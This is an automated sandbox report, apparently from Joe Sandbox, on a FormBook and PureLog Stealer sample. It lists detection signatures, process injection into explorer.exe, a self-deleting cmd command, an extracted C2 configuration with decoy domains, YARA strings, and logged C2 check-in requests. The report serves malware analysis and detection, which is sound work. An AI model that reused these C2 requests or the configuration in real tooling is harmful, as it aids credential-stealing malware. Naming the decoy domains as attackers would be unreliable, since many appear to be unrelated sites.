
Windows Analysis Report
hOe2JrpIAE.exe

Overview

General Information

Sample name:hOe2JrpIAE.exe
renamed because original name is a hash value
Original sample name:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6.exe
Analysis ID:1466892
MD5:21a8497522de5b8b12067fca910e0469
SHA1:314794ef8b3b0fc2f1efc2a68e04caa0e371ff25
SHA256:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hOe2JrpIAE.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 1996 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
    • hOe2JrpIAE.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: 21A8497522DE5B8B12067FCA910E0469)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 5712 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 3580 cmdline: /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.tires-book-robust.bond/cn26/"], "decoy": ["ajtsistemas.com", "kolotylo.info", "mraofficial.store", "shopcupsareus.com", "odishastatenews.in", "yipicircle.life", "bryve.shop", "tempotrekstore.com", "casinoslotsjoint.com", "xiaoshuoxyz.com", "art-birdsflyinghigh.com", "odvip438.com", "verlatservicios.com", "bilocoin.world", "lamaisonfacile.com", "guojiang-v37.xyz", "shsredgpoufnds.net", "thequorumcompany.com", "qf4h1tcpmgxor7b.skin", "daisyjoanniezu.cyou", "r41opxw1076r.shop", "scientificmetalscorp.co", "shopusuniform.com", "j0mui3.shop", "halqiuststone.com", "hasenkamp.dev", "549965.autos", "nadarrawellness.com", "31artspace.com", "americanidolizing.com", "vacaychateau.com", "c377b2xq.shop", "essere.love", "e2olyiab.shop", "skechersshoes-cz.com", "laurabodyboost.com", "laser-skin-treatment-19799.bond", "theburnscleanteam.com", "tiensbangladesh.net", "sothana.top", "hillingpowerhouse.com", "kingelecpos.com", "xn--y3rqw57i.com", "foton.africa", "emergencyresponsemd.com", "0pjke0.vip", "keepitkoming.shop", "lamyahkalimi.com", "dehamobilya.com", "pornerbros.top", "happyjumps.co", "pool-repair-35063.bond", "thepassionpact.shop", "elroi-mexico.com", "xztyvk.xyz", "origenworld.com", "licstarmfprabakar.com", "asfaua.com", "zenvip.club", "seo-andorra.com", "cgffwelcome.com", "sswpdx.com", "7jtsyx.pw", "australiangamesgroup.com"]}
Yara matches (FormBook)

Source:00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp
Rule:JoeSecurity_FormBook
Description:Yara detected FormBook
Author:Joe Security

Source:00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp
Rule:JoeSecurity_FormBook_1
Description:Yara detected FormBook
Author:Joe Security

Source:00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp
Rule:Windows_Trojan_Formbook_1112e116
Description:unknown
Author:unknown
Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source:00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp
Rule:Formbook_1
Description:autogenerated rule brought to you by yara-signator
Author:Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source:00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp
Rule:Formbook
Description:detect Formbook in memory
Author:JPCERT/CC Incident Response Group
Strings:
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

(29 further entries not shown)

Yara matches (PureLog Stealer)

Source:0.2.hOe2JrpIAE.exe.3f99970.7.unpack
Rule:JoeSecurity_PureLogStealer
Description:Yara detected PureLog Stealer
Author:Joe Security

Source:0.2.hOe2JrpIAE.exe.7140000.12.unpack
Rule:JoeSecurity_PureLogStealer
Description:Yara detected PureLog Stealer
Author:Joe Security

Source:0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack
Rule:JoeSecurity_PureLogStealer
Description:Yara detected PureLog Stealer
Author:Joe Security

Source:0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack
Rule:JoeSecurity_PureLogStealer
Description:Yara detected PureLog Stealer
Author:Joe Security

Source:0.2.hOe2JrpIAE.exe.5b50000.10.unpack
Rule:JoeSecurity_PureLogStealer
Description:Yara detected PureLog Stealer
Author:Joe Security

(16 further entries not shown)
No Sigma rule has matched

Snort IDS alerts

Timestamp:07/03/24-14:51:07.057746
SID:2031412
Source Port:49720
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:53:09.934739
SID:2031412
Source Port:49724
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:53:30.424657
SID:2031412
Source Port:49725
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:53:50.846445
SID:2031412
Source Port:49726
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:52:08.288538
SID:2031412
Source Port:49722
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:51:27.802913
SID:2031412
Source Port:49721
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:52:28.804978
SID:2031412
Source Port:49723
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:07/03/24-14:50:47.686112
SID:2031412
Source Port:49719
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

                Source: hOe2JrpIAE.exeAvira: detected
                Source: http://www.tires-book-robust.bond/cn26/www.foton.africaAvira URL Cloud: Label: malware
                Source: http://www.tires-book-robust.bond/cn26/Avira URL Cloud: Label: malware
                Source: www.tires-book-robust.bond/cn26/Avira URL Cloud: Label: malware
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tires-book-robust.bond/cn26/"], "decoy": ["ajtsistemas.com", "kolotylo.info", "mraofficial.store", "shopcupsareus.com", "odishastatenews.in", "yipicircle.life", "bryve.shop", "tempotrekstore.com", "casinoslotsjoint.com", "xiaoshuoxyz.com", "art-birdsflyinghigh.com", "odvip438.com", "verlatservicios.com", "bilocoin.world", "lamaisonfacile.com", "guojiang-v37.xyz", "shsredgpoufnds.net", "thequorumcompany.com", "qf4h1tcpmgxor7b.skin", "daisyjoanniezu.cyou", "r41opxw1076r.shop", "scientificmetalscorp.co", "shopusuniform.com", "j0mui3.shop", "halqiuststone.com", "hasenkamp.dev", "549965.autos", "nadarrawellness.com", "31artspace.com", "americanidolizing.com", "vacaychateau.com", "c377b2xq.shop", "essere.love", "e2olyiab.shop", "skechersshoes-cz.com", "laurabodyboost.com", "laser-skin-treatment-19799.bond", "theburnscleanteam.com", "tiensbangladesh.net", "sothana.top", "hillingpowerhouse.com", "kingelecpos.com", "xn--y3rqw57i.com", "foton.africa", "emergencyresponsemd.com", "0pjke0.vip", "keepitkoming.shop", "lamyahkalimi.com", "dehamobilya.com", "pornerbros.top", "happyjumps.co", "pool-repair-35063.bond", "thepassionpact.shop", "elroi-mexico.com", "xztyvk.xyz", "origenworld.com", "licstarmfprabakar.com", "asfaua.com", "zenvip.club", "seo-andorra.com", "cgffwelcome.com", "sswpdx.com", "7jtsyx.pw", "australiangamesgroup.com"]}
                Source: hOe2JrpIAE.exeReversingLabs: Detection: 68%
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: hOe2JrpIAE.exeJoe Sandbox ML: detected
                Source: hOe2JrpIAE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hOe2JrpIAE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: XUhH.pdb source: hOe2JrpIAE.exe
                Source: Binary string: XUhH.pdbSHA256 source: hOe2JrpIAE.exe
                Source: Binary string: netsh.pdb source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: netsh.pdbGCTL source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: hOe2JrpIAE.exe, hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 4x nop then pop edi6_2_00417D7F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 4x nop then pop edi6_2_00417DCA
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi8_2_030C7D7F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi8_2_030C7DCA

Networking

                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 162.244.93.3:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 199.59.243.226:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 14.128.41.165:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 34.149.87.45:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 3.33.130.190:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 52.60.87.163:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 34.92.194.225:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 3.33.130.190:80
Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.226 80
Source: C:\Windows\explorer.exeNetwork Connect: 162.244.93.3 80
                Source: Malware configuration extractorURLs: www.tires-book-robust.bond/cn26/
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1Host: www.tiensbangladesh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1Host: www.shopusuniform.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb HTTP/1.1Host: www.j0mui3.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb HTTP/1.1Host: www.dehamobilya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb HTTP/1.1Host: www.happyjumps.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb HTTP/1.1Host: www.yipicircle.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
                Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
                Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
                Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
                Source: Joe Sandbox ViewASN Name: PONYNETUS PONYNETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DAF82 getaddrinfo,setsockopt,recv,7_2_0E4DAF82
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1Host: www.tiensbangladesh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1Host: www.shopusuniform.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb HTTP/1.1Host: www.j0mui3.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb HTTP/1.1Host: www.dehamobilya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb HTTP/1.1Host: www.happyjumps.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb HTTP/1.1Host: www.yipicircle.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficDNS traffic detected: DNS query: www.theburnscleanteam.com
                Source: global trafficDNS traffic detected: DNS query: www.tiensbangladesh.net
                Source: global trafficDNS traffic detected: DNS query: www.shopusuniform.com
                Source: global trafficDNS traffic detected: DNS query: www.j0mui3.shop
                Source: global trafficDNS traffic detected: DNS query: www.cgffwelcome.com
                Source: global trafficDNS traffic detected: DNS query: www.dehamobilya.com
                Source: global trafficDNS traffic detected: DNS query: www.happyjumps.co
                Source: global trafficDNS traffic detected: DNS query: www.tires-book-robust.bond
                Source: global trafficDNS traffic detected: DNS query: www.foton.africa
                Source: global trafficDNS traffic detected: DNS query: www.e2olyiab.shop
                Source: global trafficDNS traffic detected: DNS query: www.yipicircle.life
                Source: global trafficDNS traffic detected: DNS query: www.tempotrekstore.com
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: hOe2JrpIAE.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: hOe2JrpIAE.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: explorer.exe, 00000007.00000000.2007072938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: hOe2JrpIAE.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000007.00000000.2010237532.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4446456942.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2009741979.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: hOe2JrpIAE.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajtsistemas.com
                Source: explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajtsistemas.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ajtsistemas.comReferer:
                Source: explorer.exe, 00000007.00000003.3777555916.000000000C8EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.
                Source: explorer.exe, 00000007.00000000.2013207443.000000000C8DD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.A
                Source: explorer.exe, 00000007.00000003.3098535056.000000000C8DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096521466.000000000C8DD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.B
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.com/cn26/www.dehamobilya.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cgffwelcome.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dehamobilya.com

                E-Banking Fraud

                Source: Yara match; file source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; file source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; file source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; file source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; file source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; file source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; file source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

